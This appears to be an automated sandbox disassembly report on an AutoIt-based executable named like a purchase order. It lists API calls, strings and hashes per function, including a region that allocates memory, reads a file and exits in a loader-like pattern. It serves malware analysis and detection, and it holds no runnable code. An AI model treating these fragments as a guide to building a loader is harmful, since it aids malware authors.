                                                                  • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                  • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                  • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                  • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                  • TranslateMessage.USER32(?), ref: 00409556
                                                                  • DispatchMessageW.USER32(?), ref: 00409561
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                  Similarity
                                                                  • API ID: Message$Peek$DispatchSleepTranslate
                                                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                  • API String ID: 1762048999-758534266
                                                                  • Opcode ID: 65ef02fb38a27282c9e7cf101ebea7aa72ed4640524a943440740a68ee139f81
                                                                  • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                  • Opcode Fuzzy Hash: 65ef02fb38a27282c9e7cf101ebea7aa72ed4640524a943440740a68ee139f81
                                                                  • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • __wcsicoll.LIBCMT ref: 00402007
                                                                  • __wcsicoll.LIBCMT ref: 0040201D
                                                                  • __wcsicoll.LIBCMT ref: 00402033
                                                                    • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                  • __wcsicoll.LIBCMT ref: 00402049
                                                                  • _wcscpy.LIBCMT ref: 0040207C
                                                                  • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                                  Similarity
                                                                  • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                                  • API String ID: 3948761352-1609664196
                                                                  • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                  • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                  • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                  • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                  • __wsplitpath.LIBCMT ref: 0040E41C
                                                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                  • _wcsncat.LIBCMT ref: 0040E433
                                                                  • __wmakepath.LIBCMT ref: 0040E44F
                                                                    • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                  • _wcscpy.LIBCMT ref: 0040E487
                                                                    • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                  • _wcscat.LIBCMT ref: 00427541
                                                                  • _wcslen.LIBCMT ref: 00427551
                                                                  • _wcslen.LIBCMT ref: 00427562
                                                                  • _wcscat.LIBCMT ref: 0042757C
                                                                  • _wcsncpy.LIBCMT ref: 004275BC
                                                                  Similarity
                                                                  • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                  • String ID: Include$\
                                                                  • API String ID: 3173733714-3429789819
                                                                  • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                  • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                  • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                  • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • _fseek.LIBCMT ref: 0045292B
                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                  • __fread_nolock.LIBCMT ref: 00452961
                                                                  • __fread_nolock.LIBCMT ref: 00452971
                                                                  • __fread_nolock.LIBCMT ref: 0045298A
                                                                  • __fread_nolock.LIBCMT ref: 004529A5
                                                                  • _fseek.LIBCMT ref: 004529BF
                                                                  • _malloc.LIBCMT ref: 004529CA
                                                                  • _malloc.LIBCMT ref: 004529D6
                                                                  • __fread_nolock.LIBCMT ref: 004529E7
                                                                  • _free.LIBCMT ref: 00452A17
                                                                  • _free.LIBCMT ref: 00452A20
                                                                  Similarity
                                                                  • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                  • String ID:
                                                                  • API String ID: 1255752989-0
                                                                  • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                  • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                  • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                  • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                                  Control-flow Graph

                                                                  Similarity
                                                                  • API ID: __fread_nolock$_fseek_wcscpy
                                                                  • String ID: FILE
                                                                  • API String ID: 3888824918-3121273764
                                                                  • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                  • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                  • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                  • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                  • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                  • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                  • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                  • ImageList_ReplaceIcon.COMCTL32(0093DD48,000000FF,00000000), ref: 00410552
                                                                  Similarity
                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                  • API String ID: 2914291525-1005189915
                                                                  • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                  • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                  • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                  • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                  • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                  • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                  • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                  • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                  • RegisterClassExW.USER32(?), ref: 0041045D
                                                                    • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                    • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                    • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                    • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                    • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                    • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                    • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(0093DD48,000000FF,00000000), ref: 00410552
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                  • String ID: #$0$AutoIt v3
                                                                  • API String ID: 423443420-4155596026
                                                                  • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                  • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                  • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                  • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _malloc
                                                                  • String ID: Default
                                                                  • API String ID: 1579825452-753088835
                                                                  • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                  • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                  • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                  • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __fread_nolock_fseek_memmove_strcat
                                                                  • String ID: AU3!$EA06
                                                                  • API String ID: 1268643489-2658333250
                                                                  • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                  • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                  • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                  • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                  • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                  • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                  • CreatePopupMenu.USER32 ref: 00401204
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                  • String ID: TaskbarCreated
                                                                  • API String ID: 129472671-2362178303
                                                                  • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                  • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                  • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                  • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • _malloc.LIBCMT ref: 004115F1
                                                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                  • std::exception::exception.LIBCMT ref: 00411626
                                                                  • std::exception::exception.LIBCMT ref: 00411640
                                                                  • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                  • String ID: ,*H$4*H$@fI
                                                                  • API String ID: 615853336-1459471987
                                                                  • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                  • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                  • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                  • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 041657B1
                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 041659D7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2170735362.0000000004163000.00000040.00000020.00020000.00000000.sdmp, Offset: 04163000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_4163000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFileFreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 204039940-0
                                                                  • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                  • Instruction ID: e67b420ed82f04f8cf5db20fa8b905e3c0f4d740f591eeb78ae1c3637c3f7163
                                                                  • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                  • Instruction Fuzzy Hash: 2AA12A70E00209EBDB14CFA4D994BEEB7B6FF48314F208599E506BB280D775AA50CF94

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: QueryValue$CloseOpen
                                                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                                                  • API String ID: 1586453840-614718249
                                                                  • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                  • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                  • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                  • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                  • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                  • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CreateShow
                                                                  • String ID: AutoIt v3$edit
                                                                  • API String ID: 1584632944-3779509399
                                                                  • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                  • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                  • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                  • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C

                                                                  Control-flow Graph
                                                                  • control_flow_graph 1237 4165480-41655d4 call 41630d0 call 4165370 CreateFileW 1244 41655d6 1237->1244 1245 41655db-41655eb 1237->1245 1246 416568b-4165690 1244->1246 1248 41655f2-416560c VirtualAlloc 1245->1248 1249 41655ed 1245->1249 1250 4165610-4165627 ReadFile 1248->1250 1251 416560e 1248->1251 1249->1246 1252 416562b-4165665 call 41653b0 call 4164370 1250->1252 1253 4165629 1250->1253 1251->1246 1258 4165667-416567c call 4165400 1252->1258 1259 4165681-4165689 ExitProcess 1252->1259 1253->1246 1258->1259 1259->1246
                                                                  APIs
                                                                    • Part of subcall function 04165370: Sleep.KERNELBASE(000001F4), ref: 04165381
                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 041655CA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2170735362.0000000004163000.00000040.00000020.00020000.00000000.sdmp, Offset: 04163000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_4163000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFileSleep
                                                                  • String ID: 9L5IDN2UEQPKVDMESQ7CQ715
                                                                  • API String ID: 2694422964-4101757676
                                                                  • Opcode ID: 458379b02acd664884a3d0b1d9d5c3d3eea1da82dde71d9728182f9268300383
                                                                  • Instruction ID: b048af33a260c5dbaf4f5d31b3b5ad7c2a7d014cca4e44cb91faf6febdfce1b5
                                                                  • Opcode Fuzzy Hash: 458379b02acd664884a3d0b1d9d5c3d3eea1da82dde71d9728182f9268300383
                                                                  • Instruction Fuzzy Hash: 8A61B270D04288EBEF11DBA4D854BEEBBB5AF14304F004199E609BB2C1D7BA5B45CBA5
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                  • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                  • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Close$OpenQueryValue
                                                                  • String ID: Control Panel\Mouse
                                                                  • API String ID: 1607946009-824357125
                                                                  • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                  • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                  • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                  • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                  APIs
                                                                  • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                  • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                  • _wcsncpy.LIBCMT ref: 004102ED
                                                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                  • _wcsncpy.LIBCMT ref: 00410340
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
